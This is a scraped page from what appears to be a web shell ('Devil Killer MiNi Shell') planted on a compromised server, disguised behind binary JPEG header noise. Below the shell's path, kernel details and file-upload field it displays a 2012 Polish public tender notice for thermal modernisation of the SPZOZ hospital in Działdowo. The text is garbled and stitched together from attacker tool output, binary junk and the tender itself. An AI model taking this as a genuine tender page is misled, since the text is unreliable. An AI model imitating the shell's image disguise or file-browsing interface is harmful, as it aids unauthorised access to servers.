JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120116/13504-N-2012.html

<p class="kh_header"><b>Działdowo: Roboty budowlane: Termomodernizacja obiektów SPZOZ w Działdowie.</b><br>
<b>Numer ogłoszenia: 13504 - 2012; data zamieszczenia: 16.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Leśna 1, 13-200 Działdowo, woj. warmińsko-mazurskie, tel. (023) 6972653, faks (023) 6972653.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz-dzialdowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane: Termomodernizacja obiektów SPZOZ w Działdowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest przedsięwzięcie polegające na termomodernizacji obiektów (dalej: obiekty termomodernizowane) należących do Samodzielnego Publicznego Zakład Opieki Zdrowotnej w Działdowie (dalej: SPZOZ w Działdowie), położonego przy ul. Leśnej nr 1 w Działdowie. Przedsięwzięcie jest współfinansowane ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej w ramach Programu Priorytetowego System Zielonych inwestycji.

1.1 Kody Wspólnego Słownika Zamówień (CPV)
45000000-7	Roboty budowlane
45262521-9	Roboty murarskie w zakresie fasad
45261910-6	Naprawa dachów
45421110-8	Instalowanie ram drzwiowych i okiennych
45410000-4	Tynkowanie
45262500-6	Roboty murarskie i murowe
45320000-6	Roboty izolacyjne
45453000-7	Roboty remontowe i renowacyjne
45321000-3	Izolacja cieplna
45421100-5	Instalowanie drzwi i okien i podobnych elementów
45261000-4	Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty
45261410-1	Izolowanie dachu
45400000-1	Roboty wykończeniowe w zakresie obiektów budowlanych
45331100-7	Instalowanie centralnego ogrzewania
45331110-0	Instalowanie kotłów
45312311-0	Montaż instalacji piorunochronnej
 
1.2	Zakres przedsięwzięcia termomodernizacyjnego obejmuje:
1.2.1 Modernizację kotłowni parowej o mocy 1,91 MW pracującej dla potrzeb ciepła technologicznego i ciepłej wody użytkowej, wytwarzającej parę wysokoprężną o nadciśnieniu 6,0 bara.  
	1.2.2 Modernizacja kotłowni wodnej o mocy 1,1 MW pracującej dla potrzeb centralnego ogrzewania o ciśnieniu pracy 4,0 bara.
1.2.3.Modernizację wewnętrznych instalacji: 
	1.2.3.1 Instalacja centralnego ogrzewania o mocy 1,1 MW,  obejmuje całkowitą wymianę instalacji centralnego ogrzewania we wszystkich obiektach szpitala oraz w budynku kuchni i w obrębie kanału ciepłowniczego przełazowego między kotłownią a kuchnią. 
	1.2.3.2 Instalacja ciepła technologicznego, obejmuje wymianę rurociągów pary wysoko- i niskoprężnej oraz kondensatu od budynku kotłowni poprzez kanał ciepłowniczy przełazowy do poszczególnych odbiorników na terenie szpitala. 
	1.2.3.3  Instalacja wody użytkowej wraz z robotami towarzyszącymi obejmującej montaż rurociągów stalowych ocynkowanych oraz rurociągów z tworzyw sztucznych, w tym rozebranie kanałów technologicznych, w których prowadzone były istniejące rurociągi i odtworzenie zabudowy rurociągów. 
	1.2.4 Instalacja solarna, wspomagająca przygotowanie ciepłej wody użytkowej dla szpitala obejmująca montaż 21 kolektorów słonecznych oraz 4 podgrzewaczy o pojemności 500 l każdy.
1.2.5 Roboty ogólnobudowlane towarzyszące przy realizacji przedsięwzięcia.
Uwaga: Przedmiotem zamówienia nie jest objęta instalacja kanalizacji.
Uwaga. Wielkości podane w 1.2, są wielkościami zaokrąglonymi. Dokładne wielkości podane zostały w dokumentacji projektowej, która stanowi załącznik do niniejszej Specyfikacji. Przy wycenie / kalkulacji prosimy o stosowanie wielkości zawartych w dokumentacji projektowej.
Uwaga. Całość powyższych prac należy wykonać zgodnie z dokumentacją i specyfikacją techniczną wykonania i odbioru robót załączoną do SIWZ oraz dołączonym harmonogramem rzeczowym.
1.3 Wykonawca zaakceptuje załączony do siwz harmonogram z procentowym postępem prac. 
Istnieje ewentualna możliwość zmiany harmonogramu w nieprzewidzianych sytuacjach, które mogą nastąpić w przyszłości, ale tylko pod warunkami określonymi w umowie zawartej między Zamawiającym, a NFOŚIGW, tj.:
- zmiany harmonogramu rzeczowo-finansowego wymagają dla swej skuteczności pisemnej zgody NFOŚiGW, z wyjątkiem zmian do wysokości 1.000,00 zł dokonywanych pomiędzy poszczególnymi kwotami wypłat, pod warunkiem, ze dotyczą tych samych kategorii kosztów i nie wpłynie to na obniżenie efektu ekologicznego,
- wniosek o zmianę harmonogramu rzeczowo-finansowego wymaga uzasadnienia oraz wskazania przewidywanego wpływu wnioskowanej zmiany na realizację przedsięwzięcia i osiągnięcie efektu rzeczowego oraz efektu ekologicznego przedsięwzięcia.
Postęp prac w odpowiednich kwartałach (II, III i IV) nie może być procentowo mniejszy niż określony w harmonogramie rzeczowym. Wynagrodzenie zostanie wypłacone zgodnie z harmonogramem rzeczowo-finansowym.
Z uwagi na prace trwające w obiekcie nie wyłączonym z eksploatacji, danego etapu prac nie mogą stanowić same tylko prace rozbiórkowe lub demontażowe. Etap prac powinien obejmować prace rozbiórkowe, demontażowe z równoczesnym montażem (przewidzianych dokumentacją) materiałów (przykładowo demontaż istniejących kotłów i montaż nowych kotłów). Opis robót budowlanych obejmujących przedmiot zamówienia zawiera dokumentacja techniczna oraz specyfikacja techniczna wykonania i odbioru robót budowlanych stanowiąca załącznik nr 12 i 13 do niniejszej SIWZ.                                                                                                                                                                                                                      
1.4 Zamawiający dopuszcza wykonanie przedmiotu zamówienia przez podwykonawców. Wykonawca zobowiązany jest w formularzu oferty, wykazać zakres prac jaki zamierza powierzyć podwykonawcom.
2.	Warunki realizacji zamówienia - wytyczne dla Wykonawcy:
2.1	Przed przystąpieniem do złożenia oferty wskazane jest dokonanie wizji lokalnej obiektów SPZOZ objętych przedmiotem zamówienia. Jeżeli Wykonawca nie doszacuje oferty, wówczas przyjmuje na siebie ryzyko wykonania wszelkich prac niezbędnych do prawidłowego wykonania przedmiotu zamówienia za cenę wskazaną w ofercie.
2.2	Roboty budowlane muszą być prowadzone zgodnie z obowiązującymi przepisami w oparciu o dokumentację techniczną  stanowiącą załącznik nr 12 i 13 do niniejszej SIWZ, wytyczne polskich instytucji (Państwowej Inspekcji Pracy, Państwowej Straży Pożarnej, Wojewódzkiego Inspektora Ochrony Środowiska, Państwowej Inspekcji Sanitarnej, Urzędu Dozoru Technicznego itp.) i zgodnie z Prawem Budowlanym oraz ze sztuką budowlaną. Wbudowane wyroby budowlane w tym materiały,  muszą spełniać kryteria określone w art.10 Ustawy z dnia 7 lipca 1994 (Dz. U. nr 89 , poz. 414) Prawo Budowlane, w szczególności muszą być dopuszczone do obrotu i powszechnego lub jednostkowego stosowania w budownictwie (posiadają certyfikaty na znak bezpieczeństwa, deklarację zgodności lub certyfikat zgodności z Polską Normą lub aprobatą techniczną, znajdują się w wykazie wyrobów nie mających istotnego wpływu na spełnienie wymagań podstawowych oraz wyrobów wytwarzanych i stosowanych według tradycyjnie uznanych zasad sztuki budowlanej, zostały wykonane według indywidualnej dokumentacji technicznej sporządzonej lub uzgodnionej z projektantem obiektu i dostawca wydał oświadczenie, że są zgodne z dokumentacją, obowiązującymi normami i przepisami).
2.3	Wykonawca obowiązany jest uzyskać zgodę Projektanta na wbudowywane materiały, które muszą być zgodne z dokumentacją techniczną załączoną do SIWZ. W przypadku zastosowania innych, nowych materiałów należy uzyskać zgodę Projektanta a materiały te powinny być równorzędne względem przewidzianych w dokumentacji technicznej.
2.4	W celu umożliwienia opomiarowania zużycia wody i energii podczas wykonywania robót na obiektach termomodernizowanych, Wykonawca zobowiązany jest zamontować na swój koszt licznik (podlicznik) wody i energii elektrycznej w terminie i miejscu (miejscach) uzgodnionych z Zamawiającym. Wykonawca będzie dokonywał opłat za zużytą energię elektryczną i wodę według wskazań licznika.
2.5	Świadectwo charakterystyki energetycznej wraz z dokumentacją powykonawczą należy przedłożyć Zamawiającemu nie później niż w dniu odbioru końcowego prac budowlanych, natomiast atesty, certyfikaty i świadectwa potwierdzające parametry lub właściwości zabudowywanych materiałów wymagane będą przez Inspektora Nadzoru przy każdym odbiorze częściowym. Protokolarny odbiór świadectwa charakterystyki energetycznej oraz dokumentacji powykonawczej przez Zamawiającego stanowi, obok dokonania odbioru końcowego prac budowlanych, warunek wystawienia faktury końcowej przez Wykonawcę. Świadectwo charakterystyki energetycznej należy sporządzić zgodnie z obowiązującymi przepisami, tj. ustawą z dnia 7 lipca 1994 r. Prawo budowlane oraz rozporządzeniem Ministra Infrastruktury z dnia 6 listopada 2008 r. w sprawie metodologii obliczania charakterystyki energetycznej budynku i lokalu mieszkalnego lub części budynku stanowiącej samodzielną całość techniczno-użytkową oraz sposobu sporządzania wzorów świadectw ich charakterystyki energetycznej.
2.6	Wykonawca obowiązany jest zapewnić usuwanie odpadów, odpadów materiałowych i pozostałości po robotach rozbiórkowych, we własnym zakresie na odpowiednie składowisko odpadów lub do innej instalacji unieszkodliwiania odpadów. Koszty związane z opłatami za usunięcie odpadów ponosi Wykonawca. Ponadto w przypadku materiałów podlegających utylizacji Wykonawca powinien na własny koszt zapewnić ich utylizację, zgodnie z wymogami Ustawy z dnia 27 kwietnia 2001 roku o odpadach i dostarczyć Zamawiającemu karty przekazania tych materiałów do utylizacji. 
2.7	Materiały z rozbiórki przeznaczone do odzysku stanowią własność Zamawiającego i Wykonawca przetransportuje je oraz złoży we wskazanym przez Zamawiającego składowisku w odległości do 3 km od siedziby Zamawiającego. Z powyższego Wykonawca sporządzi protokół materiałów pochodzących z demontażu przy udziale inspektora nadzoru i przedstawiciela Zamawiającego. Wykonawca przedstawi Zamawiającemu kwit odbioru odpadów na składowisku. 
2.8	Wykonawca obowiązany jest prowadzić prace zgodnie z zasadami Bezpieczeństwa i Higieny Pracy oraz Przepisami przeciwpożarowymi.
2.9	Termomodernizacja będzie  realizowana  w  trakcie  normalnej eksploatacji SPZOZ w Działdowie, zatem  przy  ograniczonej  zajętości  terenu budowy.  
      W związku z tym Wykonawca jest zobowiązany do:
a)	przedstawienia  uzgodnionych  z Zamawiającym  branżowych projektów  organizacji  terenu budowy  obejmujących:
	- lokalizację  i  obszar  zajętości  zaplecza  budowy,
	- drogi  transportu  materiałów  wyburzeniowych,
	- place  składowe  materiałów  do  zabudowy,
	- magazyny  części  i  materiałów  do  zabudowy,
	- wygrodzenia  i  odgrodzenia   na  zewnątrz  termomodernizowanych obiektów,
projekty  organizacji  terenu budowy będą dostarczone na 7 dni przed rozpoczęciem robót, 
b)	przedstawienia Zamawiającemu kompletnej  listy  osób funkcyjnych budowy (kierownik budowy, kierownik robót itd.) na 8 dni przed rozpoczęciem robót wraz z planem Bezpieczeństwa i ochrony zdrowia na budowie (dalej: BIOZ) i pozostałymi dokumentami niezbędnymi do zgłoszenia rozpoczęcia prac w organie Nadzoru Budowlanego,
c)	przedstawienia Zamawiającemu kompletnej listy podwykonawców na 10 dni przed rozpoczęciem robót, po podpisaniu umowy z Zamawiającym. W przypadku, gdy zgodnie z ofertą, Wykonawca zamierza powierzyć część zamówienia Podwykonawcy, jest on zobowiązany przedłożyć Zamawiającemu projekt umowy z Podwykonawcą określający pełny zakres powierzonych Podwykonawcy czynności oraz wskazać odpowiednią część dokumentacji technicznej dotyczącą podzlecanych robót i uzyskać pisemną zgodę Zamawiającego. Jeżeli Zamawiający nie zgłosi sprzeciwu w terminie 14 dni, wówczas traktuje się, że zaakceptował zgłoszonego podwykonawcę,
d)	bieżącego dokumentowania robót zanikających, zgodnie z zaleceniami Zamawiającego,
e)	bieżącego składania atestów i certyfikatów zabudowywanych materiałów i urządzeń, zgodnie z zaleceniami Zamawiającego,
f)	bieżącego składania protokołów odbioru robót częściowych,
g)	uzgodnienia z Zamawiającym Planu i Programu zapewnienia jakości robót.
2.10	Wykonawca zobowiązany jest przedłożyć Zamawiającemu dokumentację powykonawczą w 3 egzemplarzach w wersji pisemnej i zgodnie z obowiązującymi przepisami.
2.11	Wykonawca zobowiązany jest do wykonania szczelnego zabezpieczenia miejsc prowadzenia robót, zapewniającego ochronę pozostałej części SPZOZ w Działdowie przed zapyleniem.
2.12	Zamawiający ustala następujące warunki realizacji robót:
2.12.1	cisza nocna od godziny 22:00 do godz. 6:00
2.12.2	ze względu na duże obciążenie szpitalnych ciągów komunikacyjnych, Zamawiający wymaga zewnętrznego transportu materiałów, nie dopuszcza transportu przez klatki schodowe oraz przy użyciu wind
2.12.3	Wykonawca ma obowiązek przywrócić teren budowy do stanu pierwotnego po zakończeniu prac budowlanych
2.13	Wykonawca zapewni we własnym zakresie i na własny koszt wykonanie badań laboratoryjnych lub niezbędnych pomiarów wymaganych technologią wykonywanych prac.
2.14	Zamawiający we własnym zakresie i na własny koszt zapewni nadzór autorski.
2.15	Minimalny, wymagany przez Zamawiającego, okres rękojmi za wady i gwarancji należytej jakości wykonania prac termomodernizacyjnych do dnia 31.12.2017 r. ze względu na okres trwałości projektu, tj. 5 lat (wymagane przeglądy gwarancyjne 1 raz w roku w okresie gwarancji).
2.16	Zamawiający  przystąpi do odbiorów częściowych w terminie do 3 dni roboczych od daty zgłoszenia wykonania poszczególnej części przedmiotu zamówienia. Zamawiający jest zobowiązany przystąpić do odbioru końcowego w terminie do 7 roboczych dni od daty zgłoszenia wykonania całości przedmiotu zamówienia i przedłożenia kompletnych dokumentów niezbędnych do dokonania odbioru końcowego. 
2.17	Zamawiający wyznacza następujące terminy składania protokołów odbioru:
a)	za II kwartał - do dnia 04.06.2012 r.
b)	za III kwartał - do dnia 03.09.2012 r.
c)	protokół odbioru końcowego robót - nie później niż do dnia 21.11.2012 r.
2.18	Zamawiający przewiduje kwartalny sposób rozliczania płatności na podstawie faktur częściowych wystawianych za  faktycznie wykonany zakres robót zgodnie z przyjętym harmonogramem rzeczowym, których wykonanie zostało potwierdzone protokołami odbioru.
2.19	Zasady rozliczeń między Zamawiającym a Wykonawcą: 
2.19.1	rozliczenia między Zamawiającym a Wykonawcą będą dokonywane wyłącznie w złotych polskich (PLN),
2.19.2	rozliczenie robót termomodernizacyjnych nastąpi w oparciu o cenę ryczałtową danego etapu (kwartału) prac i protokół odbioru częściowego robót oraz w oparciu o końcową cenę ryczałtową całości prac i protokół odbioru końcowego robót,
2.19.3	Wykonawca wystawiać będzie faktury VAT częściowe i fakturę końcową: 
-	faktury częściowe w wysokości zryczałtowanej dla danego etapu, po zakończeniu każdego z etapów (kwartałów) wykonania robót termomodernizacyjnych i podpisaniu przez Zamawiającego protokołu odbioru tego etapu, 
oraz  
-	fakturę końcową - do całkowitej wartości całości przedsięwzięcia.
Zamawiający będzie regulować wszystkie płatności przelewem na konto Wykonawcy, w terminie do 30 dni od przyjęcia od Wykonawcy prawidłowo wystawionej faktury VAT..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.25.21-9, 45.26.19.10-6, 45.42.11.10-8, 45.41.00.00-4, 45.26.25.00-6, 45.32.00.00-6, 45.45.30.00-7, 45.32.10.00-3, 45.42.11.00-5, 45.26.10.00-4, 45.26.14.10-1, 45.40.00.00-1, 45.33.11.00-7, 45.33.11.10-0, 45.31.23.11-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium w wysokości: 140.000,00 zł   (sto czterdzieści tysięcy złotych  00/100) przed upływem terminu składania ofert.
2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
2.1.	pieniądzu;
2.2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
2.3.	gwarancjach bankowych;
2.4.	gwarancjach ubezpieczeniowych;
2.5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
3.	W przypadku wnoszenia wadium w pieniądzu, kwotę należy przelać na rachunek bankowy Zamawiającego: 
Bank Pekao S.A. o/ Działdowo Nr konta: 64 1240 5338 1111 0000 5064 7587
z dopiskiem Przetarg nieograniczony: Termomodernizacja SPZOZ w Działdowie, znak 5/PN/TO/12
Wadium uznaje się za wniesione należycie, gdy w dniu składania oferty znajduję się na rachunku Zamawiającego. W przypadku przelewu wadium na rachunek  Zamawiającego, do oferty należy dołączyć kserokopię przelewu potwierdzoną za zgodność z oryginałem. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
4.	W przypadku wnoszenia wadium w formie gwarancji lub poręczeń należy złożyć wraz z ofertą oryginał dokumentu i kserokopię poświadczoną za zgodność z oryginałem przez Wykonawcę, przy czym oryginał należy złożyć w formie umożliwiającej zwrot po zakończeniu postępowania (nie może być wszyty ani zbindowany) - KASA Szpitala.
5.	Wadium wniesione w innej niż pieniądz formie musi obejmować cały okres związania ofertą.
6.	Wykonawca, którego oferta nie będzie zabezpieczona wadium, zostanie przez Zamawiającego wykluczony z postępowania.
7.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem dyspozycji art. 46 ust. 4a Ustawy Pzp.
8.	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
9.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt 7 powyżej, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
10.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
-	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
-	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Ustawy pzp, nie złożył dokumentów, oświadczeń lub pełnomocnictw, o których mowa w pkt III i IV niniejszej SIWZ, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
11.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez Wykonawcę zgodnie z treścią załącznika nr 3 do siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 roboty instalacyjne polegające na modernizacji kotłowni i instalacji na kwotę nie mniejszą niż 3.000.000,00 zł brutto każda z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że:
 
b) wykaże, że w okresie  ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy w tym okresie - wielkość średniego rocznego zatrudnienia u wykonawcy wyniosła co najmniej 25 osób oraz średnioroczna liczebność personelu kierowniczego przez który zamawiający rozumie kierownicy budowy, kierownicy robót, majstrów wynosiła co najmniej 2 osoby.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że:
 
 a) dysponuje lub będzie dysponował:
- co najmniej 1 osobą posiadającą kwalifikacje niezbędne do wykonania zamówienia tj. posiadająca wykształcenie wyższe i uprawnienia budowlane do kierowania, nadzorowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń sanitarnych bez ograniczeń, oraz będącą członkiem samorządu zawodowego, której powierzy funkcję kierownika budowy i kierownika robót sanitarnych. 

Uwaga: Zamawiający, określając wymogi dla każdej osoby w zakresie posiadanych uprawnień
budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane oraz ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca udokumentuje, że znajduje się w sytuacji ekonomicznej i finansowej umożliwiającej wykonanie przedmiotu umowy tj.: 

a) posiada środki finansowe lub zdolność kredytową na kwotę minimum 3.000.000,00 zł.</p>
